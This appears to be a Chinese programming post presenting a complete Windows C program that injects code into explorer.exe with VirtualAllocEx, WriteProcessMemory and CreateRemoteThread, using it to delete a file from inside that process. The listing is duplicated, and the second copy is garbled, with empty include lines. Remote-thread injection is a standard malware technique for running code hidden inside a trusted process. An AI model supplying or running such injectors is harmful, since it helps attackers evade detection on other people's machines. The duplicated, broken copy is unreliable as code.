把自己的代码注入explorer.exe。详细参见源代码
#define UNICODE
#define _UNICODE
/* windows.h must precede tlhelp32.h (the latter does not include it itself). */
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <string.h>
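/*
 * Parameter block that is copied into the target process and handed to
 * remote() as its thread argument.
 *
 * remote() executes inside the target, where this module's import table does
 * not exist, so the three kernel32 entry points it needs are resolved by the
 * injector and passed here by value.  DWORD_PTR holds a full pointer on
 * 64-bit builds; the original DWORD silently truncated it to 32 bits.
 * Everything remote() reads or writes lives in this one block.
 */
typedef struct _remoteparameter
{
    DWORD_PTR rpfindfirstfile;   /* address of FindFirstFile in the target */
    DWORD_PTR rpdeletefile;      /* address of DeleteFile in the target */
    DWORD_PTR rpfindclose;       /* address of FindClose in the target */
    HANDLE rpfilehandle;         /* find handle, written back by remote() */
    WIN32_FIND_DATA rpfdata;     /* filled in by FindFirstFile in the target */
    TCHAR rptname[MAX_PATH];     /* NUL-terminated path of the file to delete */
}REMOTEPARAMETER, *PREMOTEPARAMETER;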
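/*
 * Return the PID of the first running process whose image name equals `str`
 * (case-insensitive), or (DWORD)-1 if none matches or the process snapshot
 * cannot be taken.
 *
 * NOTE(review): this definition shares its name with the Win32 API
 * GetProcessId(HANDLE).  Compiled as C++ it becomes an overload; compiled as
 * C against an SDK that declares that API it is a conflicting declaration.
 * A distinct name (e.g. FindProcessIdByName) would avoid the clash, but
 * main() calls it under this name, so it is kept.
 *
 * If several processes share the image name (e.g. more than one explorer.exe
 * on a multi-session machine) the first one in snapshot order is returned.
 */
DWORD GetProcessId(LPCTSTR str)
{
    DWORD pid = (DWORD)-1;
    PROCESSENTRY32 entry = {0};
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    /* CreateToolhelp32Snapshot signals failure with INVALID_HANDLE_VALUE, not NULL. */
    if (snap == INVALID_HANDLE_VALUE)
        return pid;

    /* dwSize must be filled in before the first Process32First call. */
    entry.dwSize = sizeof(entry);

    for (BOOL more = Process32First(snap, &entry); more; more = Process32Next(snap, &entry))
    {
        if (_tcsicmp(str, entry.szExeFile) == 0)
        {
            pid = entry.th32ProcessID;
            break;
        }
    }

    /* Single exit: the snapshot handle is released on every path. */
    CloseHandle(snap);
    return pid;
}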
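/*
 * Thread entry point executed inside the target process.
 *
 * The injector copies this function's machine code byte-for-byte into the
 * target, so it must stay self-contained: call nothing but the function
 * pointers carried in the parameter block, use no string literals, no CRT
 * helpers and no local arrays (with MSVC /GS a local array may add a
 * stack-cookie check call that resolves only in the injector's address
 * space).  Keep it that way when editing.
 *
 * Behaviour: look up rptname with FindFirstFile; if found, delete it and
 * close the find handle.  Returns 0 on success and (DWORD)-1 if the file is
 * not found, cannot be deleted, or the find handle cannot be closed.
 *
 * Fixes versus the original: the find handle is now closed even when
 * DeleteFile fails (previously it leaked inside the target), and FindClose is
 * no longer called on INVALID_HANDLE_VALUE when the file is absent.
 */
DWORD WINAPI remote(LPVOID pvparam)
{
    typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
    typedef BOOL (WINAPI *EDeleteFile)(LPCTSTR);
    typedef BOOL (WINAPI *EFindClose)(HANDLE);

    PREMOTEPARAMETER p = (PREMOTEPARAMETER)pvparam;
    EFindFirstFile pFindFirstFile = (EFindFirstFile)p->rpfindfirstfile;
    EDeleteFile pDeleteFile = (EDeleteFile)p->rpdeletefile;
    EFindClose pFindClose = (EFindClose)p->rpfindclose;
    DWORD rc = 0;

    p->rpfilehandle = pFindFirstFile(p->rptname, &p->rpfdata);
    if (p->rpfilehandle == INVALID_HANDLE_VALUE)
        return (DWORD)-1;

    if (!pDeleteFile(p->rptname))
        rc = (DWORD)-1;

    /* Close the find handle on every path so nothing leaks in the target. */
    if (!pFindClose(p->rpfilehandle))
        rc = (DWORD)-1;

    return rc;
}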
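/*
 * Injector entry point: copy remote() and a REMOTEPARAMETER block into
 * explorer.exe, run remote() there on a new thread, wait for it, report its
 * result, and release everything that was allocated in the target.
 *
 * Returns 0 if the remote thread ran and reported success, -1 if no
 * explorer.exe was found, -2 on any open/allocate/copy failure, -3 if the
 * thread could not be created or reported failure.
 *
 * Assumptions this demo does not verify:
 *  - injector and target have the same bitness; copying x86 code into a
 *    64-bit explorer.exe would crash it (an IsWow64Process check would make
 *    this explicit).
 *  - kernel32.dll is mapped at the same base in both processes, so the
 *    GetProcAddress results obtained here are valid in the target.
 *  - remote() is contiguous, self-contained machine code (see its comment);
 *    REMOTE_CODE_BYTES is a generous upper bound, not a measured size -- C
 *    offers no portable way to obtain a function's length.
 *  - UNICODE and _UNICODE are defined together; the A/W entry point is picked
 *    to match the LPCTSTR / WIN32_FIND_DATA that windows.h selected.
 *
 * Fixes versus the original: OpenProcess/GetModuleHandle/GetProcAddress
 * results are checked; the parameter copy is exactly sizeof(rp) bytes (the
 * original copied sizeof(TCHAR)*sizeof(rp), i.e. stack bytes past rp, into
 * the target); the code page is never writable and executable at once; the
 * thread is waited for before the remote allocations are freed; no handle or
 * remote allocation is leaked on any path.
 */
int main()
{
    enum { REMOTE_CODE_BYTES = 4096 };
    static const TCHAR name[] = _T("c:\\shenyue.txt");
#ifdef UNICODE
    static const char *kFindFirst = "FindFirstFileW", *kDelete = "DeleteFileW";
#else
    static const char *kFindFirst = "FindFirstFileA", *kDelete = "DeleteFileA";
#endif
    REMOTEPARAMETER rp;
    HMODULE hkernel32;
    HANDLE rphandle = NULL, ethread = NULL;
    LPVOID remotethr = NULL, remotepar = NULL;
    DWORD remotepid, oldprot, exitcode = (DWORD)-1;
    int rc = -2;

    remotepid = GetProcessId(_T("explorer.exe"));
    if (remotepid == (DWORD)-1)
        return -1;

    /* The access rights documented as required by CreateRemoteThread. */
    rphandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                           PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                           FALSE, remotepid);
    if (rphandle == NULL)
        return -2;

    /* Resolve everything remote() will call before touching the target. */
    hkernel32 = GetModuleHandle(_T("kernel32.dll"));
    if (hkernel32 == NULL)
        goto cleanup;
    memset(&rp, 0, sizeof(rp));
    rp.rpfindfirstfile = (DWORD_PTR)GetProcAddress(hkernel32, kFindFirst);
    rp.rpdeletefile    = (DWORD_PTR)GetProcAddress(hkernel32, kDelete);
    rp.rpfindclose     = (DWORD_PTR)GetProcAddress(hkernel32, "FindClose");
    if (!rp.rpfindfirstfile || !rp.rpdeletefile || !rp.rpfindclose)
        goto cleanup;
    /* rptname holds MAX_PATH TCHARs; refuse rather than overflow it. */
    if (sizeof(name) > sizeof(rp.rptname))
        goto cleanup;
    memcpy(rp.rptname, name, sizeof(name));

    /* Code page: allocate writable, copy, then drop write access (no RWX page). */
    remotethr = VirtualAllocEx(rphandle, NULL, REMOTE_CODE_BYTES, MEM_COMMIT, PAGE_READWRITE);
    if (remotethr == NULL)
        goto cleanup;
    if (!WriteProcessMemory(rphandle, remotethr, (LPCVOID)remote, REMOTE_CODE_BYTES, NULL))
        goto cleanup;
    if (!VirtualProtectEx(rphandle, remotethr, REMOTE_CODE_BYTES, PAGE_EXECUTE_READ, &oldprot))
        goto cleanup;
    FlushInstructionCache(rphandle, remotethr, REMOTE_CODE_BYTES);

    /* Parameter page: exactly sizeof(rp) bytes, nothing from the stack beyond it. */
    remotepar = VirtualAllocEx(rphandle, NULL, sizeof(rp), MEM_COMMIT, PAGE_READWRITE);
    if (remotepar == NULL)
        goto cleanup;
    if (!WriteProcessMemory(rphandle, remotepar, &rp, sizeof(rp), NULL))
        goto cleanup;

    rc = -3;
    ethread = CreateRemoteThread(rphandle, NULL, 0, (LPTHREAD_START_ROUTINE)remotethr,
                                 remotepar, 0, NULL);
    if (ethread == NULL)
        goto cleanup;

    /* The target executes out of remotethr until the thread ends; wait before freeing. */
    WaitForSingleObject(ethread, INFINITE);
    if (GetExitCodeThread(ethread, &exitcode) && exitcode == 0)
        rc = 0;

cleanup:
    if (ethread != NULL)
        CloseHandle(ethread);
    if (remotepar != NULL)
        VirtualFreeEx(rphandle, remotepar, 0, MEM_RELEASE);
    if (remotethr != NULL)
        VirtualFreeEx(rphandle, remotethr, 0, MEM_RELEASE);
    CloseHandle(rphandle);
    return rc;
}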
#define _UNICODE
#include
#include
#include
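/*
 * Parameter block that is copied into the target process and handed to
 * remote() as its thread argument.
 *
 * remote() executes inside the target, where this module's import table does
 * not exist, so the three kernel32 entry points it needs are resolved by the
 * injector and passed here by value.  DWORD_PTR holds a full pointer on
 * 64-bit builds; the original DWORD silently truncated it to 32 bits.
 * Everything remote() reads or writes lives in this one block.
 */
typedef struct _remoteparameter
{
    DWORD_PTR rpfindfirstfile;   /* address of FindFirstFile in the target */
    DWORD_PTR rpdeletefile;      /* address of DeleteFile in the target */
    DWORD_PTR rpfindclose;       /* address of FindClose in the target */
    HANDLE rpfilehandle;         /* find handle, written back by remote() */
    WIN32_FIND_DATA rpfdata;     /* filled in by FindFirstFile in the target */
    TCHAR rptname[MAX_PATH];     /* NUL-terminated path of the file to delete */
}REMOTEPARAMETER, *PREMOTEPARAMETER;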
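/*
 * Return the PID of the first running process whose image name equals `str`
 * (case-insensitive), or (DWORD)-1 if none matches or the process snapshot
 * cannot be taken.
 *
 * NOTE(review): this definition shares its name with the Win32 API
 * GetProcessId(HANDLE).  Compiled as C++ it becomes an overload; compiled as
 * C against an SDK that declares that API it is a conflicting declaration.
 * A distinct name (e.g. FindProcessIdByName) would avoid the clash, but
 * main() calls it under this name, so it is kept.
 *
 * If several processes share the image name (e.g. more than one explorer.exe
 * on a multi-session machine) the first one in snapshot order is returned.
 */
DWORD GetProcessId(LPCTSTR str)
{
    DWORD pid = (DWORD)-1;
    PROCESSENTRY32 entry = {0};
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    /* CreateToolhelp32Snapshot signals failure with INVALID_HANDLE_VALUE, not NULL. */
    if (snap == INVALID_HANDLE_VALUE)
        return pid;

    /* dwSize must be filled in before the first Process32First call. */
    entry.dwSize = sizeof(entry);

    for (BOOL more = Process32First(snap, &entry); more; more = Process32Next(snap, &entry))
    {
        if (_tcsicmp(str, entry.szExeFile) == 0)
        {
            pid = entry.th32ProcessID;
            break;
        }
    }

    /* Single exit: the snapshot handle is released on every path. */
    CloseHandle(snap);
    return pid;
}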
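/*
 * Thread entry point executed inside the target process.
 *
 * The injector copies this function's machine code byte-for-byte into the
 * target, so it must stay self-contained: call nothing but the function
 * pointers carried in the parameter block, use no string literals, no CRT
 * helpers and no local arrays (with MSVC /GS a local array may add a
 * stack-cookie check call that resolves only in the injector's address
 * space).  Keep it that way when editing.
 *
 * Behaviour: look up rptname with FindFirstFile; if found, delete it and
 * close the find handle.  Returns 0 on success and (DWORD)-1 if the file is
 * not found, cannot be deleted, or the find handle cannot be closed.
 *
 * Fixes versus the original: the find handle is now closed even when
 * DeleteFile fails (previously it leaked inside the target), and FindClose is
 * no longer called on INVALID_HANDLE_VALUE when the file is absent.
 */
DWORD WINAPI remote(LPVOID pvparam)
{
    typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
    typedef BOOL (WINAPI *EDeleteFile)(LPCTSTR);
    typedef BOOL (WINAPI *EFindClose)(HANDLE);

    PREMOTEPARAMETER p = (PREMOTEPARAMETER)pvparam;
    EFindFirstFile pFindFirstFile = (EFindFirstFile)p->rpfindfirstfile;
    EDeleteFile pDeleteFile = (EDeleteFile)p->rpdeletefile;
    EFindClose pFindClose = (EFindClose)p->rpfindclose;
    DWORD rc = 0;

    p->rpfilehandle = pFindFirstFile(p->rptname, &p->rpfdata);
    if (p->rpfilehandle == INVALID_HANDLE_VALUE)
        return (DWORD)-1;

    if (!pDeleteFile(p->rptname))
        rc = (DWORD)-1;

    /* Close the find handle on every path so nothing leaks in the target. */
    if (!pFindClose(p->rpfilehandle))
        rc = (DWORD)-1;

    return rc;
}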
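/*
 * Injector entry point: copy remote() and a REMOTEPARAMETER block into
 * explorer.exe, run remote() there on a new thread, wait for it, report its
 * result, and release everything that was allocated in the target.
 *
 * Returns 0 if the remote thread ran and reported success, -1 if no
 * explorer.exe was found, -2 on any open/allocate/copy failure, -3 if the
 * thread could not be created or reported failure.
 *
 * Assumptions this demo does not verify:
 *  - injector and target have the same bitness; copying x86 code into a
 *    64-bit explorer.exe would crash it (an IsWow64Process check would make
 *    this explicit).
 *  - kernel32.dll is mapped at the same base in both processes, so the
 *    GetProcAddress results obtained here are valid in the target.
 *  - remote() is contiguous, self-contained machine code (see its comment);
 *    REMOTE_CODE_BYTES is a generous upper bound, not a measured size -- C
 *    offers no portable way to obtain a function's length.
 *  - UNICODE and _UNICODE are defined together.  NOTE(review): this listing
 *    defines only _UNICODE above its includes; without UNICODE, windows.h
 *    selects the ANSI LPCTSTR/WIN32_FIND_DATA while tchar.h makes TCHAR
 *    wide, so add `#define UNICODE` next to `#define _UNICODE`.  The A/W
 *    entry point below is picked to match what windows.h selected.
 *
 * Fixes versus the original: OpenProcess/GetModuleHandle/GetProcAddress
 * results are checked; the parameter copy is exactly sizeof(rp) bytes (the
 * original copied sizeof(TCHAR)*sizeof(rp), i.e. stack bytes past rp, into
 * the target); the code page is never writable and executable at once; the
 * thread is waited for before the remote allocations are freed; no handle or
 * remote allocation is leaked on any path.
 */
int main()
{
    enum { REMOTE_CODE_BYTES = 4096 };
    static const TCHAR name[] = _T("c:\\shenyue.txt");
#ifdef UNICODE
    static const char *kFindFirst = "FindFirstFileW", *kDelete = "DeleteFileW";
#else
    static const char *kFindFirst = "FindFirstFileA", *kDelete = "DeleteFileA";
#endif
    REMOTEPARAMETER rp;
    HMODULE hkernel32;
    HANDLE rphandle = NULL, ethread = NULL;
    LPVOID remotethr = NULL, remotepar = NULL;
    DWORD remotepid, oldprot, exitcode = (DWORD)-1;
    int rc = -2;

    remotepid = GetProcessId(_T("explorer.exe"));
    if (remotepid == (DWORD)-1)
        return -1;

    /* The access rights documented as required by CreateRemoteThread. */
    rphandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                           PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                           FALSE, remotepid);
    if (rphandle == NULL)
        return -2;

    /* Resolve everything remote() will call before touching the target. */
    hkernel32 = GetModuleHandle(_T("kernel32.dll"));
    if (hkernel32 == NULL)
        goto cleanup;
    memset(&rp, 0, sizeof(rp));
    rp.rpfindfirstfile = (DWORD_PTR)GetProcAddress(hkernel32, kFindFirst);
    rp.rpdeletefile    = (DWORD_PTR)GetProcAddress(hkernel32, kDelete);
    rp.rpfindclose     = (DWORD_PTR)GetProcAddress(hkernel32, "FindClose");
    if (!rp.rpfindfirstfile || !rp.rpdeletefile || !rp.rpfindclose)
        goto cleanup;
    /* rptname holds MAX_PATH TCHARs; refuse rather than overflow it. */
    if (sizeof(name) > sizeof(rp.rptname))
        goto cleanup;
    memcpy(rp.rptname, name, sizeof(name));

    /* Code page: allocate writable, copy, then drop write access (no RWX page). */
    remotethr = VirtualAllocEx(rphandle, NULL, REMOTE_CODE_BYTES, MEM_COMMIT, PAGE_READWRITE);
    if (remotethr == NULL)
        goto cleanup;
    if (!WriteProcessMemory(rphandle, remotethr, (LPCVOID)remote, REMOTE_CODE_BYTES, NULL))
        goto cleanup;
    if (!VirtualProtectEx(rphandle, remotethr, REMOTE_CODE_BYTES, PAGE_EXECUTE_READ, &oldprot))
        goto cleanup;
    FlushInstructionCache(rphandle, remotethr, REMOTE_CODE_BYTES);

    /* Parameter page: exactly sizeof(rp) bytes, nothing from the stack beyond it. */
    remotepar = VirtualAllocEx(rphandle, NULL, sizeof(rp), MEM_COMMIT, PAGE_READWRITE);
    if (remotepar == NULL)
        goto cleanup;
    if (!WriteProcessMemory(rphandle, remotepar, &rp, sizeof(rp), NULL))
        goto cleanup;

    rc = -3;
    ethread = CreateRemoteThread(rphandle, NULL, 0, (LPTHREAD_START_ROUTINE)remotethr,
                                 remotepar, 0, NULL);
    if (ethread == NULL)
        goto cleanup;

    /* The target executes out of remotethr until the thread ends; wait before freeing. */
    WaitForSingleObject(ethread, INFINITE);
    if (GetExitCodeThread(ethread, &exitcode) && exitcode == 0)
        rc = 0;

cleanup:
    if (ethread != NULL)
        CloseHandle(ethread);
    if (remotepar != NULL)
        VirtualFreeEx(rphandle, remotepar, 0, MEM_RELEASE);
    if (remotethr != NULL)
        VirtualFreeEx(rphandle, remotethr, 0, MEM_RELEASE);
    CloseHandle(rphandle);
    return rc;
}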